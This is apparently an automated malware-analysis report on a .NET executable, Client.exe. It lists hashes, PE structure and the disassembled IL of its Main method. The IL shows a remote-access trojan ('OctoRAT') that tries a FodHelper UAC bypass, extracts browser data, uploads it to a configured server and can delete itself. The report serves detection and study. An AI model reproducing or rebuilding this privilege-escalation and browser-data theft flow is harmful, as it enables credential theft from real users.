Suspicious
Suspect

e62d2b68f8730d6698305630fe4b7e5b

PE Executable | MD5: e62d2b68f8730d6698305630fe4b7e5b | Size: 350.72 KB | application/x-dosexec


Characteristics

Symbol Obfuscation Score: Low

Hash: Hash Value
MD5: e62d2b68f8730d6698305630fe4b7e5b
Sha1: c0b0d6ad612a347d1c4f0c1ad652069eb58c4a30
Sha256: 77e14df7fb73b07b316c9b8d22af12cb2aec57c01fb6a861e9be3a7eba459892
Sha384: 52792ef0e0dbd1ded7a75cc82177f7e483de828d85abe889d1fd3d37242a4003da0e41a5171e708646867bd362306355
Sha512: 050a5c915c16f0c9ee01fdf6b4d0000d91b7255a9dfeb86c448d599c8e4fa3c93cd81c8f015ceb7d090eda9f0f821c9b5fbff9b4d873f289cd5aaa4126de8c98
SSDeep: 6144:C1p9ZGm1+3rUQaksJeyqIpgvi/JS3JkkAPjG589bAIpX7NhQol:q8r340sJeo5S3dAPjwWbQol
TLSH: 0F74085077F94500F1FF2F79A8B205214AB7B897AD39D70D098A949E1E73B81EC60B63
File Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
  .text
  .rsrc
  .reloc
Resources
  RT_RCDATA
    ID:0001
      ID:0
    ID:0002
      ID:0
    ID:0003
      ID:0
  RT_VERSION
    ID:0001
      ID:0
  RT_MANIFEST
    ID:0001
      ID:0
Information
Name: Value
Info: PE Detect: PeReader OK (file layout)
Info: PDB Path: C:\Users\sulum\OneDrive\Desktop\datacenter\server - Copy\stubCsharp\obj\Release\Client.pdb
Module Name: Client.exe
Full Name: Client.exe
EntryPoint: System.Void Client.Program::Main(System.String[])
Scope Name: Client.exe
Scope Type: ModuleDef
Kind: Windows
Runtime Version: v4.0.30319
Tables Header Version: 512
WinMD Version: <null>
Assembly Name: Client
Assembly Version: 1.0.0.0
Assembly Culture: <null>
Has PublicKey: False
PublicKey Token: <null>
Target Framework: .NETFramework,Version=v4.8
Total Strings: 2892
Main Method: System.Void Client.Program::Main(System.String[])
Main IL Instruction Count: 175

Main IL

call System.Void BrowserDataExtractor.iamfine::EnsureBouncyCastleDLL() ldstr [{0:yyyy-MM-dd HH:mm:ss}] === RMM Client Starting === call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::IsRunningElevated() brtrue IL_0134: ldnull call System.String Client.ResourceReader::GetConfig() stloc.2 <null> ldc.i4.0 <null> stloc.3 <null> ldloc.2 <null> call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0061: ldloc.3 ldloc.2 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 124 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.s V_4 ldloc.s V_4 ldlen <null> conv.i4 <null> ldc.i4.5 <null> blt.s IL_0061: ldloc.3 ldloc.s V_4 ldc.i4.4 <null> ldelem.ref <null> ldstr true call System.Boolean System.String::op_Equality(System.String,System.String) stloc.3 <null> ldloc.3 <null> brfalse IL_011B: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Not running as admin, attempting FodHelper UAC bypass... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Boolean Client.Program::BypassUACFodHelper() brfalse.s IL_00AB: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas..." 
ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass successful, process will restart elevated call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) ldc.i4 3000 call System.Void System.Threading.Thread::Sleep(System.Int32) ret <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] FodHelper failed, trying runas... call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) call System.Diagnostics.Process System.Diagnostics.Process::GetCurrentProcess() callvirt System.Diagnostics.ProcessModule System.Diagnostics.Process::get_MainModule() callvirt System.String System.Diagnostics.ProcessModule::get_FileName() stloc.s V_5 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor() dup <null> ldloc.s V_5 callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldstr runas callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Verb(System.String) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) pop <null> leave IL_0262: ret pop <null> ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass failed, continuing without elevation call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0134: ldnull ldstr [{0:yyyy-MM-dd HH:mm:ss}] UAC bypass disabled, browser extraction requires admin privileges call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void 
System.Console::WriteLine(System.String) ldnull <null> newobj System.Void BrowserDataExtractor.BrowserDataExtractor::.ctor(System.String) stloc.0 <null> ldloc.0 <null> callvirt System.Void BrowserDataExtractor.BrowserDataExtractor::Run() call System.String Client.ResourceReader::GetIP() stloc.s V_6 call System.String Client.ResourceReader::GetPort() stloc.s V_7 ldloc.s V_6 call System.Boolean System.String::IsNullOrEmpty(System.String) brtrue.s IL_0161: ldstr "127.0.0.1" ldloc.s V_7 call System.Boolean System.String::IsNullOrEmpty(System.String) brfalse.s IL_016F: ldloc.s V_7 ldstr 127.0.0.1 stloc.s V_6 ldstr 8080 stloc.s V_7 ldloc.s V_7 ldloca.s V_8 call System.Boolean System.Int32::TryParse(System.String,System.Int32&) brtrue.s IL_0181: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}..." ldc.i4 8080 stloc.s V_8 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Uploading browser data to {1}:{2}... call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_6 ldloc.s V_8 box System.Int32 call System.String System.String::Format(System.String,System.Object,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) ldloc.0 <null> ldloc.s V_6 ldloc.s V_8 callvirt System.Boolean BrowserDataExtractor.BrowserDataExtractor::UploadToServer(System.String,System.Int32) brfalse.s IL_01CA: ldstr "[{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed!" ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data uploaded successfully! call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) br.s IL_01E3: leave.s IL_0209 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Browser data upload failed! 
call System.DateTime System.DateTime::get_Now() box System.DateTime call System.String System.String::Format(System.String,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 stloc.s V_9 ldstr [{0:yyyy-MM-dd HH:mm:ss}] Error uploading browser data: {1} call System.DateTime System.DateTime::get_Now() box System.DateTime ldloc.s V_9 callvirt System.String System.Exception::get_Message() call System.String System.String::Format(System.String,System.Object,System.Object) call System.Void System.Console::WriteLine(System.String) leave.s IL_0209: ldc.i4.1 ldc.i4.1 <null> ldstr OctoRAT_Client_Mutex_{B4E5F6A7-8C9D-0E1F-2A3B-4C5D6E7F8A9B} ldloca.s V_1 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.s V_10 ldloc.1 <null> brtrue.s IL_021D: nop leave.s IL_0262: ret nop <null> call System.Void Client.Program::Initialize() call System.Void Client.Program::Run() leave.s IL_0262: ret stloc.s V_11 ldstr Fatal error: ldloc.s V_11 callvirt System.String System.Exception::get_Message() call System.String System.String::Concat(System.String,System.String) call System.Void Client.Program::WriteLog(System.String) leave.s IL_0262: ret call System.Void Client.Program::Cleanup() ldsfld System.Boolean Client.Program::meltEnabled brfalse.s IL_0255: endfinally call System.Void Client.Program::SelfDelete() endfinally <null> ldloc.s V_10 brfalse.s IL_0261: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ret <null>
